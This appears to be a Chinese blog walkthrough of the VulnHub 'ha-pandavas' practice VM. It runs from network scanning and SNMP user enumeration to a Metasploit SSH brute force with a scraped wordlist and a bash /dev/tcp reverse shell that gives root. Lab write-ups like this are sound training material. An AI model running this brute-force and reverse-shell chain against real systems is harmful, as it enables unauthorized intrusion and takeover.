<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    vulnhub之ha-pandavas的實踐

    VSole2023-05-22 09:06:52

    今天實踐的是vulnhub的ha-pandavas鏡像,

    下載地址,https://download.vulnhub.com/ha/pandavas.zip,

    用workstation打開,首先做地址掃描,

    sudo netdiscover -r 192.168.177.0/24,

    獲取到靶機地址192.168.177.135,

    再繼續做端口掃描,sudo nmap -sS -sV -T5 -A -p- 192.168.177.135

    再繼續做udp端口的掃描,sudo nmap -sU -p161 192.168.177.135,

    有snmp服務,walk一下,snmpwalk -v1 -c public 192.168.177.135,

    獲取到用戶名,karna,

    有web服務,瀏覽器訪問,http://192.168.177.135,

    爬取字典,cewl http://192.168.177.135 > dict.txt,

    使用metasploit進行ssh暴力破解,msfconsole,

    use auxiliary/scanner/ssh/ssh_login

    set RHOSTS 192.168.177.135

    set USERNAME karna

    set PASS_FILE /home/kali/dict.txt

    exploit

    獲取到karna/Surya,直接ssh登錄,

    ssh karna@192.168.177.135,

    查看到其它賬戶,暴力破解改名,set USERNAME krishna,

    繼續獲取到krishna/Bhagavad,切到krishna,

    sudo -l確認可以root身份執行任何程序,

    kali攻擊機那邊用nc開個反彈shell監聽,nc -lvp 4444,

    靶機這邊執行,sudo -u root bash -i >& /dev/tcp/192.168.177.131/4444 0>&1,

    kali攻擊機這邊獲取到反彈shell,確認是root,

    本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束,本周的實踐到此結束。

    sshsudo
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    今天實踐的是vulnhub的Corrosion2鏡像, 下載地址,https://download.vulnhub.com/corrosion/Corrosion2.ova, 用workstation導入成功,能掃描到地址, sudo netdiscover -r 192.168.137.0/24,
    vulnhub之five86的實踐
    2022-04-05 12:20:23
    今天實踐的是vulnhub的five86鏡像,下載地址, https://download.vulnhub.com/five86/Five86-1.zip, 用workstation導入成功,先做地址掃描, sudo netdiscover -r 192.168.137.0/24,
    名稱:(家庭)難度:中等創作者:cromiphi發布日期:2021-04-30目標:user.txt和falg.txt,root權限搭建靶機下載完Family.ova后,使用Oracle VM VirtualBox導入即可導入時注意!!
    隨著 Windows 10 IoT 的發布,我們也將可以用上運行 Windows 的樹莓派。自問世以來,受眾多計算機發燒友和創客的追捧,曾經一“派”難求。然后進入文件夾可以看到一個 img 的鏡像,大小為 1.7GB 左右。把內存卡插入讀卡器后,插入電腦。我們進入 boot 分區內,然后新建一個名為 ssh 的文件,注意不要后綴名!!!!
    Raspberry Pi(中文名為樹莓派,簡寫為 RPi,(或者 RasPi / RPI) 是為學習計算機編程教育而設計),只有信用卡大小的微型電腦,其系統基于 Linux。隨著 Windows 10 IoT 的發布,我們也將可以用上運行 Windows 的樹莓派。 自問世以來,受眾多計算機發燒友和創客的追捧,曾經一“派”難求。別看其外表“嬌小”,內“心”卻很強大,視頻、音頻等功能通通皆有,可謂
    提及 Redis 自然是耳熟能詳,說起 Redis 的漏洞的話,未授權訪問漏洞、主從復制漏洞等也是張口就來,所以打算對 Redis 進行一個全面的總結。
    九種DC靶機滲透測試
    2023-01-07 11:14:37
    點擊上方藍字 關注安全知識DC-1靶機測試1.DC-1靶機安裝安裝進去后,修改網絡設置為nat模式2.靶機
    Raspberry Pi(中文名為樹莓派,簡寫為 RPi,(或者 RasPi / RPI) 是為學習計算機編程教育而設計),只有信用卡大小的微型電腦,其系統基于 Linux。隨著 Windows 10 IoT 的發布,我們也將可以用上運行 Windows 的樹莓派。
    SSH代理轉發
    2022-03-04 22:03:04
    瀏覽器開啟代理SOCK5可以看到IP發生變化四、SSH本地轉發網絡拓撲圖1.kali能與邊界服務器互通。這里用ubuntu作為邊界服務器sudo apt-get install openssh-server //安裝SSH服務
    PersistenceIsFutile,8個后門。雖然說用腳本跑下就基本全出來了,但我還是想要個矜持的
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类